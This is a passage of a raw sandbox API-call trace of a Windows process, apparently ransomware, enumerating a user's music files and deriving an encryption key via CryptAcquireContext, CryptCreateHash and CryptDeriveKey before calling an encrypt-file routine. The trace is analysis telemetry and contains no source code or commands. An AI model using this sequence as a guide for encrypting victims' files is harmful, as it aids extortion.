(Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ces8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.995] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.995] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.995] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.995] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0037.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.996] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.996] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.996] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.996] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.997] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.997] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834f67b0, ftCreationTime.dwHighDateTime=0x1d5c055, ftLastAccessTime.dwLowDateTime=0x263901d0, ftLastAccessTime.dwHighDateTime=0x1d5c447, ftLastWriteTime.dwLowDateTime=0x263901d0, ftLastWriteTime.dwHighDateTime=0x1d5c447, nFileSizeHigh=0x0, nFileSizeLow=0xde21, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="gYCwk0YFX3naEmF50.mp3", cAlternateFileName="GYCWK0~1.MP3")) returned 0x7c2240 [0037.997] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.997] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.997] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.997] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.997] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.997] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.997] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.998] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.998] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.998] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.998] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.998] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.998] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.998] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.998] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.998] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0037.998] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.999] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.999] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.999] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.999] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.999] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.999] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.999] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.000] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.000] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.000] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.000] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.000] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.000] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.000] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.000] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.000] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.000] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.000] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.001] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.001] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.001] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.001] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.001] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.001] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.001] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.001] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.001] CryptHashData (hHash=0x7c2100, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0038.002] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.002] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.002] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0038.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.002] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.002] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0038.002] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.002] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0038.002] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.002] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.002] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.002] 